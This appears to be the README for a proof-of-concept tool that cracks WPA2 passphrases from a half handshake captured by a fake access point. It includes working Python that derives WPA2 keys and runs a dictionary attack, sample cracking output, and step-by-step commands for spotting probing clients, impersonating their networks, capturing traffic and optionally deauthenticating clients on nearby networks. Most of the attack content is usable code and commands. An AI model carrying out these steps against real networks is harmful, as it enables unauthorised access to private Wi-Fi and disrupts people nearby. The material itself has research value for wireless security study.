This is a proof of concept showing that a fake access point can capture enough of a WPA2 handshake from a client to crack the network passphrase, without the real AP being present and without knowing its passphrase.
Conventional WPA2 attacks work by listening for a handshake between a client and the real access point. The full four-way handshake is then used in a dictionary attack. This tool is a proof of concept showing that the real access point does not need to be present at all. An attacker can simply listen for WPA2 probe requests from any client within range, then bring up an access point with that SSID and an arbitrary passphrase. The authentication will fail, because the passphrase is wrong, but the failed handshake still contains enough to attack: the fake AP's message 1 carries the ANonce it chose, and the client's message 2 carries the SNonce and a MIC computed from the PMK that the client derived from the real passphrase and the SSID. Together with the two MAC addresses, that is everything a dictionary attack needs.
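The reason the half handshake is sufficient, shown as an added example rather than the project's own code: the client's message 2 MIC depends only on the PMK (PBKDF2 of passphrase and SSID), the two MAC addresses and the two nonces, all of which the fake AP either chose itself or can read off the air. The block below derives PMK, PTK and KCK per IEEE 802.11i, builds a constructed message 2 signed with the passphrase from the usage example, then recovers that passphrase by dictionary attack. The client MAC, the nonces and the word list are assumptions invented for the example; the AP MAC, SSID and passphrase are the ones from this README.

```python
import hashlib
import hmac
import struct

# Offsets inside an EAPOL-Key frame (802.1X header of 4 bytes, then the key
# descriptor): Key Nonce starts at 17, Key MIC starts at 81.
NONCE_OFFSET = 17
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    """PRF-384: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(pmk, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the frame with the MIC zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct a four-way handshake message 2 (client -> AP), as a real client would send it."""
    # Minimal RSN IE (CCMP pairwise, PSK) carried in Key Data; constructed for the example.
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    # Descriptor type 2 (RSN), Key Info 0x010A (version 2, pairwise, MIC set), Key Length 0, Replay Counter 1
    body = struct.pack(">BHHQ", 2, 0x010A, 0, 1)
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # Key Nonce, Key IV, Key RSC, Key ID
    body += b"\x00" * 16                                          # Key MIC placeholder
    body += struct.pack(">H", len(rsn_ie)) + rsn_ie               # Key Data Length, Key Data
    frame = struct.pack(">BBH", 2, 3, len(body)) + body           # 802.1X version 2, type 3 = EAPOL-Key
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes,
          msg2: bytes, wordlist):
    """Dictionary attack: recompute the MIC of message 2 for each candidate passphrase."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    target_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target_mic):
            return candidate
    return None


def demo(wordlist=("password", "letmein", "interwebs", "hunter2")):
    """Stage a half handshake with the README's AP MAC, SSID and passphrase, then crack it."""
    ssid = "no place like 127.0.0.1"
    ap_mac = bytes.fromhex("48d224f0d128")       # fake AP MAC from the README
    client_mac = bytes.fromhex("020000000001")   # assumed client MAC (locally administered)
    anonce = bytes(range(32))                    # assumed ANonce, chosen by the fake AP in message 1
    snonce = bytes(range(32, 64))                # assumed SNonce, chosen by the client in message 2
    # The client side: it knows the real passphrase and signs message 2 with the derived KCK.
    kck = ptk_from_pmk(pmk_from_passphrase("interwebs", ssid), ap_mac, client_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, kck)
    # The attacker side: no real AP, no passphrase, only what was on the air.
    return crack(ssid, ap_mac, client_mac, anonce, msg2, wordlist)


if __name__ == "__main__":
    print("Passphrase found!", demo())
```

Note that the fake AP never needs to reach message 3: the attacker already holds the ANonce because it generated it, and everything else is in the client's message 2. The same derivation works for a full handshake, which is why the tool accepts those too.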
Author: Dylan Ayrey
Mandatory arguments:
-r Where to read the input pcap file with the half handshake (works with full handshakes too)
-m AP MAC address (of the 'fake' access point that was used during the capture)
-s AP SSID
Optional arguments:
-d Where to read the dictionary from
WPA2-HalfHandshake-Crack Usage Example
To read an input pcap file containing a half handshake (-r sampleHalfHandshake.cap) captured by a fake AP with the specified MAC (-m 48d224f0d128) and SSID (-s "no place like 127.0.0.1"):
python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
loading dictionary...
0.00788388022717% done. 250.469172638 hashes per second
0.0143003228938% done. 237.207726195 hashes per second
0.0212346846995% done. 238.343685782 hashes per second
0.0286869656441% done. 243.284719499 hashes per second
0.0353048213093% done. 240.624328943 hashes per second
0.0408005188399% done. 232.44365987 hashes per second
0.0468141355095% done. 229.104042665 hashes per second
0.0534895377457% done. 229.456259021 hashes per second
0.0597908872703% done. 228.302626008 hashes per second
0.0664375162209% done. 228.54339761 hashes per second
0.0731129184571% done. 228.830520246 hashes per second
0.0798170939787% done. 229.162336484 hashes per second
0.0865212695004% done. 229.442956452 hashes per second
Passphrase found! interwebs
Capturing half handshakes
To listen for device probes, the aircrack-ng suite can be used as follows:
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
You should begin to see probe requests from clients listed at the bottom with BSSID "(not associated)". If the probed SSIDs shown for these clients belong to WPA2 networks, those clients can be targeted.
Set up a WPA2 Wi-Fi network whose SSID matches the SSID the target device is probing for. The passphrase can be anything, since the client, not the AP, proves knowledge of the real passphrase in message 2.
Capture traffic on the interface that the fake AP is running on, so that the AP's message 1 and the client's message 2 both end up in the file.
On Linux this can be done with tcpdump:
sudo tcpdump -i wlan0 -s 65535 -w file.cap
(optional) Deauthenticate clients from nearby Wi-Fi networks to provoke more probes
If there are not enough unassociated clients, the aircrack-ng suite can be used to deauthenticate clients from nearby networks; disconnected clients will start probing for their known SSIDs again: http://www.aircrack-ng.org/doku.php?id=deauthentication
How to install WPA2-HalfHandshake-Crack
Installation on Kali Linux
git clone https://github.com/dxa4481/WPA2-HalfHandshake-Crack.git
cd WPA2-HalfHandshake-Crack/
sudo python setup.py install